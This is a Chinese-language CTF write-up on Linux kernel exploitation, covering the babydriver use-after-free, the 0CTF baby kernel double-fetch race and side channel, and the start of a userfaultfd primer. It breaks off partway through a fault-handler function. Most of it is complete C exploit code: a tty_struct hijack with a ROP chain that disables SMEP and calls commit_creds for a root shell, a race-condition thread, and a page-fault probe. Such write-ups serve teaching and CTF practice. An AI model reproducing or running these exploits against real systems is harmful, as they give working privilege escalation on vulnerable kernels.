一、Kernel Heap - UAF
例题:CISCN - 2017 - babydriver
典中典题,大伙珍惜,从中可以学到很多结构体的认识
1.题目逆向
首先就是检查一些脚本
#!/bin/bash
qemu-system-x86_64 -initrd core.cpio -kernel bzImage -append 'console=ttyS0 root=/dev/ram oops=panic
panic=1' -enable-kvm -monitor /dev/null -m 128M --nographic -smp cores=1,threads=1 -cpu kvm64,+smep
-s
- 单核单线程
- 开启smep(执行禁止)
- 在kvm64 和 +smep的情况下会自动开启KPTI
以及文件系统的启动脚本
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
chown root:root flag
chmod 400 flag
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console
insmod /lib/modules/4.4.72/babydriver.ko
chmod 777 /dev/babydev
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
setsid cttyhack setuidgid 1000 sh
umount /proc
umount /sys
poweroff -d 0 -f
可以看到加载了一个babydriver.ko
模块,大致就是需要逆这里
因此我们例行checksec一下
dawn@dawn-virtual-machine:~/KernelLearning/babydriver$
'/home/dawn/KernelLearning/babydriver/extract/lib/modules/4.4.72/babydriver.ko'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x0)
然后就开始我们的逆向过程,如下:
babydriver_init没必要看,大致意思就是注册了一个/dev/babydev
的设备,下面看fops
.data:00000000000008C0 ; ===========================================================================
.data:00000000000008C0
.data:00000000000008C0 ; Segment type: Pure data
.data:00000000000008C0 ; Segment permissions: Read/Write
.data:00000000000008C0 _data segment align_32 public 'DATA' use64
.data:00000000000008C0 assume cs:_data
.data:00000000000008C0 ;org 8C0h
.data:00000000000008C0 public fops
.data:00000000000008C0 ; file_operations fops
.data:00000000000008C0 C0 09 00 00 00 00 00 00 00 00+fops file_operations <offset __this_module, 0, offset babyread, offset babywrite, 0, 0, 0, 0, \
.data:00000000000008C0 00 00 00 00 00 00 30 01 00 00+ ; DATA XREF: babydriver_init:loc_1AA↑o
.data:00000000000008C0 00 00 00 00 F0 00 00 00 00 00+ offset babyioctl, 0, 0, offset babyopen, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \
.data:00000000000008C0 00 00 00 00 00 00 00 00 00 00+ 0>
.data:00000000000008C0 00 00 00 00 00 00 00 00 00 00+_data ends
.data:00000000000008C0 00 00 00 00 00 00 00 00 00 00+
这里也就是该设备的一个file_operations
,实现了read,ioctl,open,write等函数,因此我们首先看open
/*
 * open() handler of the babydev device (IDA decompilation).
 * Allocates a 64-byte buffer and stores both the pointer and the length in the
 * global babydev_struct, overwriting whatever a previous open() left there.
 */
int __fastcall babyopen(inode *inode, file *filp)
{
__int64 v2; // rdx
_fentry__(inode, filp);
// 64-byte allocation served from kmalloc_caches[6]
babydev_struct.device_buf = (char *)kmem_cache_alloc_trace(kmalloc_caches[6], 0x24000C0LL, 64LL);
babydev_struct.device_buf_len = 64LL;
printk("device open\n", 0x24000C0LL, v2);
return 0;
}
可以看到我们open的时候,他首先调用kmem_cache_alloc_trace
函数分配了内核空间给全局变量babydev_struct
的字段,然后赋值其中长度字段为64,然后我们来看ioctl函数
// local variable allocation has failed, the output may be wrong!
/*
 * ioctl() handler of the babydev device (IDA decompilation).
 * For command 0x10001 it frees the buffer currently held in babydev_struct and
 * replaces it with a fresh _kmalloc() allocation of v4 bytes, recording v4 as
 * the new length. Any other command is logged and rejected with -22.
 * NOTE(review): v3/v4 come from rdx per the decompiler annotation, presumably
 * the third argument `arg` -- confirm against the disassembly.
 */
__int64 __fastcall babyioctl(file *filp, unsigned int command, unsigned __int64 arg)
{
size_t v3; // rdx
size_t v4; // rbx
__int64 v5; // rdx
_fentry__(filp, *(_QWORD *)&command);
v4 = v3;
if ( command == 0x10001 )
{
// drop the old buffer, then allocate a caller-sized replacement
kfree(babydev_struct.device_buf);
babydev_struct.device_buf = (char *)_kmalloc(v4, 0x24000C0LL);
babydev_struct.device_buf_len = v4;
printk("alloc done\n", 0x24000C0LL, v5);
return 0LL;
}
else
{
printk(&unk_2EB, v3, v3);
return -22LL;
}
}
这里可以看到我们可以通过该函数来重新分配内核堆块给全局变量babydev_struct
,这样显得open有点多余了说
然后我们来看关键漏洞点,也就是release函数,或者说close函数,如下:
/*
 * release()/close() handler of the babydev device (IDA decompilation).
 * Frees babydev_struct.device_buf but never clears the pointer, so the global
 * keeps referring to freed memory after the call.
 */
int __fastcall babyrelease(inode *inode, file *filp)
{
__int64 v2; // rdx
_fentry__(inode, filp);
// the pointer stored in babydev_struct is left untouched after this kfree()
kfree(babydev_struct.device_buf);
printk("device release\n", filp, v2);
return 0;
}
可以看到他是释放掉了我们的全局变量指向的分配堆块,但并没有赋空值,所以存在一个悬垂指针供我们利用.
其余的read和write函数就是正常的读写,没必要单独贴出来.
2.利用tty_struct
达成提权
我们的/dev
目录下面存在一个伪终端设备/dev/ptmx
,该设备打开后会创建一个tty_struct
结构体,其中同其他设备一样存在着tty_operations
结构体,因此不难理解我们可以利用UAF来劫持该结构体,然后覆写其中的函数指针至我们的ROP链来达成提权效果,大致思路如下:
- 分别打开两次,
/dev/babydev
,那么我们就能得到同时指向一个堆块的两个指针
- 我们通过ioctl函数来修改堆块的大小,改变成能劫持下面tty_struct的大小
- 然后我们释放掉其中一个设备,释放掉对应全局变量堆块,但是我们仍存在一个指向该释放堆块的指针
- 我们再打开
/dev/ptmx
设备,因此分配一个堆块来存放tty_struct
结构体
- 我们就可以利用之前还剩余的那个指针来修改
tty_struct
指向我们构造的fake_operations
(什么时候构造都可以,可以指向栈中,但是要在本步骤前熬)
- 之后我们调用
fake_operations
中的相关函数就可以达成任意代码执行,进而提权.
其中最主要的地方其实就是我们需要知道tty_struct
的大小,然后修改之前堆块的大小来满足释放的堆块重新分配了.我们接下来就是寻找他的大小,这里直接剧透为0x2e0
其中tty_struct
结构体的大致情况如下,位于include/linux/tty.h
中:
/*
 * Excerpt of struct tty_struct as quoted from include/linux/tty.h.
 * The member of interest for the exploit is `ops`, the pointer to the
 * tty_operations function table.
 */
struct tty_struct {
int magic;
struct kref kref;
struct device *dev; /* class device or NULL (e.g. ptys, serdev) */
struct tty_driver *driver;
const struct tty_operations *ops;
int index;
/* Protects ldisc changes: Lock tty not pty */
struct ld_semaphore ldisc_sem;
struct tty_ldisc *ldisc;
struct mutex atomic_write_lock;
struct mutex legacy_mutex;
struct mutex throttle_mutex;
struct rw_semaphore termios_rwsem;
struct mutex winsize_mutex;
/* Termios values are protected by the termios rwsem */
struct ktermios termios, termios_locked;
char name[64];
unsigned long flags;
int count;
struct winsize winsize; /* winsize_mutex */
struct {
spinlock_t lock;
bool stopped;
bool tco_stopped;
unsigned long unused[0];
} __aligned(sizeof(unsigned long)) flow;
struct {
spinlock_t lock;
struct pid *pgrp;
struct pid *session;
unsigned char pktstatus;
bool packet;
unsigned long unused[0];
} __aligned(sizeof(unsigned long)) ctrl;
int hw_stopped;
unsigned int receive_room; /* Bytes free for queue */
int flow_change;
struct tty_struct *link;
struct fasync_struct *fasync;
wait_queue_head_t write_wait;
wait_queue_head_t read_wait;
struct work_struct hangup_work;
void *disc_data;
void *driver_data;
spinlock_t files_lock; /* protects tty_files list */
struct list_head tty_files;
#define N_TTY_BUF_SIZE 4096
int closing;
unsigned char *write_buf;
int write_cnt;
/* If the tty has a pending do_SAK, queue it here - akpm */
struct work_struct SAK_work; // contains a function pointer, which can be used to leak the kernel base address
struct tty_port *port;
} __randomize_layout;
其中值得注意的就是我们的const struct tty_operations *ops;
它指向一个tty_operations
结构体,它位于include/linux/tty_driver.h
当中, 如下:
/*
 * Excerpt of struct tty_operations as quoted from include/linux/tty_driver.h:
 * the table of function pointers a tty_struct reaches through its `ops` member.
 */
struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
unsigned int (*write_room)(struct tty_struct *tty);
unsigned int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
int (*get_serial)(struct tty_struct *tty, struct serial_struct *p);
int (*set_serial)(struct tty_struct *tty, struct serial_struct *p);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;
这里我们执行到ROP链后写cr4寄存器为0x6f0来绕过SMEP,然后打ret2user,但这里每次提权成功后返回userland的时候到swapgs后的pop rbp总会报错
0xffffffff81063694 <native_swapgs+4> swapgs
► 0xffffffff81063697 <native_swapgs+7> pop rbp
0xffffffff81063698 <native_swapgs+8> ret
↓
0xffffffff814e35ef <tty_audit_log+239> iretq
0xffffffff814e35f1 <tty_audit_log+241> ret
0xffffffff814e35f2 <tty_audit_log+242> dec dword ptr [rax - 0x75]
0xffffffff814e35f5 <tty_audit_log+245> push rbp
0xffffffff814e35f6 <tty_audit_log+246> test al, init_module+36 <72>
0xffffffff814e35f8 <tty_audit_log+248> mov esi, dword ptr [rbp - 0x50]
0xffffffff814e35fb <tty_audit_log+251> mov rdi, rbx
0xffffffff814e35fe <tty_audit_log+254> call audit_log_n_hex <audit_log_n_hex>
──────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffeb93ba830 ◂— 0x0
01:0008│ 0x7ffeb93ba838 —▸ 0xffffffff814e35ef (tty_audit_log+239) ◂— iretq
02:0010│ 0x7ffeb93ba840 —▸ 0x402001 ◂— endbr64
03:0018│ 0x7ffeb93ba848 ◂— 0x33 /* '3' */
04:0020│ 0x7ffeb93ba850 ◂— 0x246
05:0028│ 0x7ffeb93ba858 —▸ 0x7ffeb93ba7d0 —▸ 0xffff880005fc7758 ◂— 0xcc
06:0030│ 0x7ffeb93ba860 ◂— 0x2b /* '+' */
07:0038│ 0x7ffeb93ba868 ◂— 0x0
──────────────────────────────────────────────────────────────────────────────────────────────────
► f 0 0xffffffff81063697 native_swapgs+7
──────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> i all-registers cr3
cr3 0x5fe2000 [ PDBR=2 PCID=0 ]
据推测这里应该确实是KPTI开启的情况,但为什么加了nopti还是有这个存在呢,难以理解,但是本题利用的过程算是摸清楚了
exp如下:
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/mman.h>
#include <string.h>
#include <sched.h>
#include <stdio.h>
#define __USE_GNU
#include <pthread.h>
/* Hard-coded kernel addresses used by this exploit (no KASLR handling here). */
size_t prepare_kernel_cred = 0xffffffff810a1810;
size_t commit_creds = 0xffffffff810a1420;
size_t init_cred = 0xffffffff82a6b700;
/* Gadget addresses; each name spells out the instruction sequence it stands for. */
const size_t pop_rdi = 0xffffffff810d238d;
const size_t pop_rsi = 0xffffffff811dd9ae;
const size_t pop_rdx = 0xffffffff81440b72;
/* NOTE(review): "rc4" looks like a typo for "cr4" -- main() uses this gadget right after loading 0x6f0 into rdi. */
const size_t mov_rc4_rdi_pop_rbp = 0xffffffff81004d80;
const size_t swapgs_pop_rbp = 0xffffffff81063694;
const size_t iretq = 0xffffffff8181a797;
const size_t mov_rsp_rax_ret = 0xffffffff8181bfc5;
const size_t pop_rax_ret = 0xffffffff8100ce6e;
const size_t mov_rdi_rax_pop2 = 0xffffffff8133b32e;
/* Prints a label followed by a value formatted with %p, in blue. */
#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)
void info_log(char*);
void error_log(char*);
void saveStatus();
void get_shell();
void getRootPrivilige();
void bind_cpu(int);
/* User-mode register snapshot filled in by saveStatus() and consumed by the iretq frame in main(). */
size_t user_cs, user_ss, user_rflags, user_sp;
/*
 * Snapshot the current user-mode cs, ss, rsp and rflags into the globals
 * user_cs, user_ss, user_sp and user_rflags, then log success.
 * NOTE(review): the asm uses destination-first operand order, so it presumably
 * needs to be built with -masm=intel -- confirm the build flags.
 */
void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
info_log("Status has been saved Successfully!");
}
/* Print `str` in bold green, prefixed with "[+]" and followed by a newline. */
void info_log(char* str){
    static const char green_fmt[] = "\033[0m\033[1;32m[+]%s\033[0m\n";

    printf(green_fmt, str);
}

/* Print `str` in bold red, then terminate the process with exit status 1. */
void error_log(char* str){
    static const char red_fmt[] = "\033[0m\033[1;31m%s\033[0m\n";

    printf(red_fmt, str);
    exit(1);
}
/* Spawn /bin/sh through system(); main() places this function's address in the iretq frame as the user-mode return target. */
void get_shell(){
    const char *shell_path = "/bin/sh";

    system(shell_path);
}
/*
 * Calls commit_creds(prepare_kernel_cred(NULL)) through the hard-coded kernel
 * addresses held in the globals prepare_kernel_cred and commit_creds.
 * Intended to be reached from the ROP chain while running in kernel mode.
 */
void getRootPrivilige(void)
{
    /* The addresses are stored as integers; converting them to function
       pointers needs an explicit cast (an implicit conversion is rejected by
       current compilers). */
    void *(*prepare_kernel_cred_ptr)(void *) = (void *(*)(void *))prepare_kernel_cred;
    int (*commit_creds_ptr)(void *) = (int (*)(void *))commit_creds;

    commit_creds_ptr(prepare_kernel_cred_ptr(NULL));
}
void main(){
saveStatus();
int i;
size_t buff[0x10] = {0};
size_t rop[0x100] = {0};
size_t fake_tty_operations[0x30] = {0};
PRINT_ADDR("fake_tty_operations", fake_tty_operations);
size_t tty_struct_padding[0x10] = {0};
int p = 0;
rop[p++] = pop_rdi;
rop[p++] = 0x6f0;
rop[p++] = mov_rc4_rdi_pop_rbp;
rop[p++] =((size_t)&rop&(~0xfff));
rop[p++] = getRootPrivilige;
rop[p++] = swapgs_pop_rbp;
rop[p++] = ((size_t)&rop&(~0xfff));
rop[p++] = iretq;
rop[p++] = get_shell;
rop[p++] = user_cs;
rop[p++] = user_rflags;
rop[p++] = user_sp;
rop[p++] = user_cs;
for(i = 0; i < 0x10; i++){
fake_tty_operations[i] = mov_rsp_rax_ret;
}
fake_tty_operations[0] = pop_rax_ret;
fake_tty_operations[1] = rop;
int fd1 = open("/dev/babydev", 2);
int fd2 = open("/dev/babydev", 2);
ioctl(fd1, 0x10001, 0x2e0);
close(fd1);
//alloc the UAF chunk to tty_struct
int fd3 = open("/dev/ptmx", 2);
//overwrite the tty_struct->ops
read(fd2, tty_struct_padding, 0x30);
tty_struct_padding[3] = fake_tty_operations;
write(fd2, tty_struct_padding, 0x30);
write(fd3, buff, 0x10);
}
二、Race Condition条件竞争
大伙应该都听过这个名词,也就是利用了如今计算机领域常见的同步和互斥导致的问题来进行攻击
例题:0CTF2018 Final - baby kernel
整个模块就实现了ioctl,如下:
/*
 * ioctl() handler of the baby module (IDA decompilation).
 *   0x6666: print the kernel address of `flag` to the kernel log.
 *   0x1337: validate the user-supplied {pointer, length} pair, then compare
 *           the pointed-to bytes with `flag` one byte at a time; on a full
 *           match the flag is printed to the kernel log.
 * Returns 0 on success, 22 on a byte mismatch and 14 when a check fails or the
 * command is unknown.
 */
__int64 __fastcall baby_ioctl(__int64 a1, __int64 a2)
{
    __int64 v2; // rdx
    int i; // [rsp-5Ch] [rbp-5Ch]
    __int64 v5; // [rsp-58h] [rbp-58h]
    _fentry__(a1, a2);
    v5 = v2;
    if ( a2 == 0x6666 )
    {
        printk("Your flag is at %px! But I don't think you know it's content\n", flag);
        return 0LL;
    }
    else if ( a2 == 0x1337
           && !_chk_range_not_ok(v2, 16LL, *(__readgsqword(&current_task) + 0x1358))// check1: the 16-byte argument struct must lie below the limit (0x7ffff...)
           && !_chk_range_not_ok(*v5, *(v5 + 8), *(__readgsqword(&current_task) + 0x1358))// check2: the buffer the struct points to must lie below the limit (0x7ffff...)
           && *(v5 + 8) == strlen(flag) ) // check3: the supplied length must equal strlen(flag)
    {
        /* The user buffer is dereferenced again here, after the checks above. */
        for ( i = 0; i < strlen(flag); ++i )
        {
            if ( *(*v5 + i) != flag[i] )
                return 22LL;
        }
        printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag);
        return 0LL;
    }
    else
    {
        return 14LL;
    }
}
这里可以看到他是首先给出了flag的地址,然后再与我们传入的数据结构进行比较,其中有三个check
- 检查我们的传入数据结构是否位于用户态(这里的(&current_task)+0x1358的值是可以通过动调知道)
- 检查我们传入数据结构指向的块是否位于用户态
- 检查指向块的长度是否等于flag的长度
检查完毕后再来查看我们传入的块里面的数据是否等于flag值,如果等于则打印在内核输出当中
下面就是本次讲解的例题手法
1.double fetch
这里的double fetch就是两次取的意思,我们可以知道,在内核检测数据的过程中,以及到达开始比较的过程当中,这一段缝隙对于人来说可能是十分短且可以忽略的地方,而对于程序来说那就不是这样了,我们可以充分利用这段间隙,在该地址通过检测的情况下再立刻修改他指向的值,这样就可以绕过检测,这里给出a3师傅的图
这里值得注意的一点就是在我们使用pthread
函数簇的时候,记得编译选项加上-lpthread
我们的exp如下:
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/mman.h>
#include <string.h>
#include <sched.h>
#include <stdio.h>
#include <pthread.h>
#include <sys/types.h>
#include <string.h>
#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)
/* Handle of the racing thread created in main(). */
pthread_t compete_thread;
/* Harmless user-space decoy buffer that the argument struct initially points to. */
char buf[0x30] = "peiwithhao";
/* competition_time: iterations per racing batch; status: cleared by main() once "flag{" shows up in the log output. */
int competition_time = 0x1000, status = 1;
/* Address of the kernel flag, parsed by main() from the dmesg output. */
long long real_addr;
/* Argument passed to ioctl(0x1337): a pointer plus a length (33 here). */
struct{
void* flag_addr;
size_t flag_len;
}flag = {.flag_addr = buf, .flag_len = 33};
/*
 * Racing thread: while `status` is non-zero, keep overwriting flag.flag_addr
 * with real_addr so a concurrent ioctl() can observe the swapped pointer
 * between its range check and its comparison loop.
 *
 * The signature matches what pthread_create() expects; `arg` is unused.
 * Always returns NULL.
 */
void* competition_thread(void *arg){
    (void)arg;
    /* Volatile accesses keep the compiler from hoisting the `status` load or
       collapsing the repeated stores, both of which would defeat the race. */
    while(*(volatile int *)&status){
        for(int i = 0; i < competition_time; i++){
            *(void * volatile *)&flag.flag_addr = (void *)real_addr;
        }
    }
    return NULL;
}
void info_log(char*);
void error_log(char*);
/* Emit `str` as a bold-green "[+]" status line. */
void info_log(char* str){
    const char *const fmt = "\033[0m\033[1;32m[+]%s\033[0m\n";

    printf(fmt, str);
}

/* Emit `str` as a bold-red line and exit with status 1. */
void error_log(char* str){
    const char *const fmt = "\033[0m\033[1;31m%s\033[0m\n";

    printf(fmt, str);
    exit(1);
}
void main(){
int fd = open("/dev/baby", 2);
ioctl(fd, 0x6666);
system("dmesg | grep flag > addr.txt");
int addr_fd = open("/addr.txt", 0);
lseek(addr_fd, 31, SEEK_SET);
char buf[0x10] = {0};
char* temp = (char*)malloc(0x1000);
buf[read(addr_fd, buf, 0x10)] = '\0';
sscanf(buf, "%lx", &real_addr);
PRINT_ADDR("flag", real_addr);
pthread_create(&compete_thread, NULL, competition_thread, NULL);
while(status){
for(int i = 0; i < competition_time ; i++){
flag.flag_addr = buf;
ioctl(fd, 0x1337, &flag);
}
system("dmesg | grep flag > result.txt");
int result_fd = open("/result.txt", 0);
read(result_fd, temp, 0x1000);
if(strstr(temp, "flag{")){
status = 0;
}
}
pthread_cancel(compete_thread);
info_log("finish");
system("dmesg | grep flag");
}
2. 侧信道
顾名思义,其就是使用一种完全偏离正常解题思路的一种攻击手段,譬如更加像物理黑客那样达成自己的目的,有的侧信道解法甚至使用到加解密判断中运行时长的差别来判断整体程序的运行。本题同样存在侧信道解法。
我们在上面都接触到,只有题目中传递到了正确的flag值我们才可以获取flag,但是就这么个检查flag的过程是一个字节一个字节检测的,所以说我们可以采用下面这个思路:
- 我们每次传递一定长度的flag值,并逐位进行爆破
- 每次判断正确的办法也很简单,如果我们传递了错误的值,程序就会正常退出,如果我们传递正确的值该怎么办呢,这里给出解答,我们可以mmap出一页范围,然后将部分flag置于页末尾,那么如果我们flag的最后一个符号匹配,程序就会接着往后面访问判断是否匹配,但是这就到了下一页,其大概率会出现访问panic
大致情况如下:
如下exp,我们可以通过传递参数的方式来猜:
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/mman.h>
#include <string.h>
#include <sched.h>
#include <stdio.h>
#include <pthread.h>
#include <sys/types.h>
#include <string.h>
#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)
/* NOTE(review): compete_thread, competition_time, status and real_addr are not used by the main() of this side-channel exploit. */
pthread_t compete_thread;
/* Points at the page that main() obtains from mmap(). */
char *buf;
int competition_time = 0x1000, status = 1;
long long real_addr;
/* Argument passed to ioctl(0x1337): flag_addr is filled in by main(); flag_len is fixed at 33. */
struct{
void* flag_addr;
size_t flag_len;
}flag = {.flag_len = 33};
/*
 * Racing thread body: while `status` is non-zero, keep storing real_addr into
 * flag.flag_addr.
 *
 * Declared with the pthread start-routine signature; `arg` is unused.
 * Always returns NULL.
 */
void* competition_thread(void *arg){
    (void)arg;
    /* Volatile accesses stop the compiler from hoisting the `status` load or
       merging the repeated stores. */
    while(*(volatile int *)&status){
        for(int i = 0; i < competition_time; i++){
            *(void * volatile *)&flag.flag_addr = (void *)real_addr;
        }
    }
    return NULL;
}
void info_log(char*);
void error_log(char*);
/* Write `str` to stdout as a bold-green line carrying a "[+]" prefix. */
void info_log(char* str){
    static const char ok_fmt[] = "\033[0m\033[1;32m[+]%s\033[0m\n";

    printf(ok_fmt, str);
}

/* Write `str` to stdout as a bold-red line, then exit(1). */
void error_log(char* str){
    static const char err_fmt[] = "\033[0m\033[1;31m%s\033[0m\n";

    printf(err_fmt, str);
    exit(1);
}
/*
 * Side-channel probe: places the guessed flag prefix (argv[1]) at the very end
 * of a mapped page and hands it to ioctl(0x1337). If every guessed byte
 * matches, the driver's comparison loop walks past the end of the page into
 * unmapped memory; a wrong guess makes the ioctl return normally.
 */
void main(int argc, char** argv){
    if(argc < 2){
        error_log("Usage: ./exp <flag>");
    }

    int fd = open("/dev/baby", 2);
    if(fd < 0){
        error_log("open /dev/baby failed");
    }

    size_t flag_len = strlen(argv[1]);
    if(flag_len == 0 || flag_len > 0x1000){
        /* a longer guess would start before the mapped page */
        error_log("guess must be between 1 and 4096 bytes long");
    }

    /* Map two pages and drop the second one, so the address right after the
       guess is guaranteed to be unmapped rather than merely likely to be. */
    buf = (char *)mmap(NULL, 0x2000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0);
    if(buf == MAP_FAILED){
        error_log("mmap failed");
    }
    if(munmap(buf + 0x1000, 0x1000) != 0){
        error_log("munmap failed");
    }

    void* flag_addr = buf + 0x1000 - flag_len;
    memcpy(flag_addr, argv[1], flag_len);
    flag.flag_addr = flag_addr;
    ioctl(fd, 0x1337, &flag);
}
例题:强网杯2021线上赛-notebook
1.userfaultfd基础
该类技术就是让我们用户来处理本该由内核处理的事件,其中就比如缺页异常等。
userfaultfd 机制为在用户态控制缺页处理提供了可能,进程可以在用户空间为自己的程序定义page fault handler,增加了灵活性,但也可能由于类似FUSE之于内核FS的问题(调用层次加深)而影响性能。
他被实现一个系统调用供我们使用,我们可以查看其帮助手册,如下
SYNOPSIS
#include <sys/types.h>
#include <linux/userfaultfd.h>
int userfaultfd(int flags);
Note: There is no glibc wrapper for this system call; see NOTES.
DESCRIPTION
userfaultfd() creates a new userfaultfd object that can be used for delegation of page-fault handling to a user-space application, and returns a file descriptor that refers to the new object. The new userfaultfd ob?
ject is configured using ioctl(2).
Once the userfaultfd object is configured, the application can use read(2) to receive userfaultfd notifications. The reads from userfaultfd may be blocking or non-blocking, depending on the value of flags used for
the creation of the userfaultfd or subsequent calls to fcntl(2).
The following values may be bitwise ORed in flags to change the behavior of userfaultfd():
O_CLOEXEC
Enable the close-on-exec flag for the new userfaultfd file descriptor. See the description of the O_CLOEXEC flag in open(2).
O_NONBLOCK
Enables non-blocking operation for the userfaultfd object. See the description of the O_NONBLOCK flag in open(2).
When the last file descriptor referring to a userfaultfd object is closed, all memory ranges that were registered with the object are unregistered and unread events are flushed.
Usage
The userfaultfd mechanism is designed to allow a thread in a multithreaded program to perform user-space paging for the other threads in the process. When a page fault occurs for one of the regions registered to the
userfaultfd object, the faulting thread is put to sleep and an event is generated that can be read via the userfaultfd file descriptor. The fault-handling thread reads events from this file descriptor and services
them using the operations described in ioctl_userfaultfd(2). When servicing the page fault events, the fault-handling thread can trigger a wake-up for the sleeping thread.
It is possible for the faulting threads and the fault-handling threads to run in the context of different processes. In this case, these threads may belong to different programs, and the program that executes the
faulting threads will not necessarily cooperate with the program that handles the page faults. In such non-cooperative mode, the process that monitors userfaultfd and handles page faults needs to be aware of the
changes in the virtual memory layout of the faulting process to avoid memory corruption.
Starting from Linux 4.11, userfaultfd can also notify the fault-handling threads about changes in the virtual memory layout of the faulting process. In addition, if the faulting process invokes fork(2), the user?
faultfd objects associated with the parent may be duplicated into the child process and the userfaultfd monitor will be notified (via the UFFD_EVENT_FORK described below) about the file descriptor associated with the
userfault objects created for the child process, which allows the userfaultfd monitor to perform user-space paging for the child process. Unlike page faults which have to be synchronous and require an explicit or
implicit wakeup, all other events are delivered asynchronously and the non-cooperative process resumes execution as soon as the userfaultfd manager executes read(2). The userfaultfd manager should carefully synchro?
nize calls to UFFDIO_COPY with the processing of events.
userfaultfd()函数被用来创建一个对象,用作用户空间的缺页处理,并返回一个指向该对象的文件描述符,该对象使用ioctl进行配置,配置过后我们就可以使用read函数读取其中的userfaultfd消息,该读取是否会被阻塞取决于创建uffd对象时的flag值或后续的fcntl
调用
我们要使用他,首先需要获得上面这样一个结构体,使用如下代码:
long uffd = syscall(_NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
获得这样一个结构体后,我们需要使用ioctl来进行之后的配置、注册内存区域、或者说是缺页处理,其中ioctl的命令参数如下:
- UFFDIO_REGISTER: 注册一个监视区域
- UFFDIO_COPY: 上面的区域出现缺页后,使用该命令来向缺页的地址拷贝自定义数据
然后我们需要使用mmap来映射出一片匿名区域,然后将其定义为监视区,再使用ioctl注册该区域
// 注册时要用一个struct uffdio_register结构传递注册信息:
// struct uffdio_range {
// __u64 start; /* Start of range */
// __u64 len; /* Length of range (bytes) */
// };
//
// struct uffdio_register {
// struct uffdio_range range;
// __u64 mode; /* Desired mode of operation (input) */
// __u64 ioctls; /* Available ioctl() operations (output) */
// };
/* Create a private anonymous mapping. The memory will be
demand-zero paged--that is, not yet allocated. When we
actually touch the memory, it will be allocated via
the userfaultfd. */
addr = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)
// addr 和 len 分别是我匿名映射返回的地址和长度,赋值到uffdio_register
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
// mode 只支持 UFFDIO_REGISTER_MODE_MISSING
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
// 用ioctl的UFFDIO_REGISTER注册
ioctl(uffd, UFFDIO_REGISTER, &uffdio_register);
然后我们就需要启动一个线程进行轮询,来捕获对于我们该页的异常
// The main thread calls pthread_create to start a fault-handler thread, passing uffd as its argument
pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
一个自定义的线程函数举例如下,这里处理的是一个普通的匿名页用户态缺页,我们要做的是把我们一个已有的一个page大小的buffer内容拷贝到缺页的内存地址处。用到了poll函数轮询uffd,并对轮询到的UFFD_EVENT_PAGEFAULT事件(event)用拷贝(ioctl的UFFDIO_COPY选项)进行处理。
上面一段是我引用Jcix师傅的原话,侵删~~
下面就是我们的fault_handler_thread
/*
 * Thread routine that services page faults reported on a userfaultfd.
 *
 * arg carries the userfaultfd file descriptor, cast to a pointer. For every
 * UFFD_EVENT_PAGEFAULT it fills a private page with a letter that changes per
 * fault and copies it into the faulting page with UFFDIO_COPY. The loop never
 * ends on its own; any error terminates the process.
 */
static void *
fault_handler_thread(void *arg)
{
    static struct uffd_msg msg; /* Data read from userfaultfd */
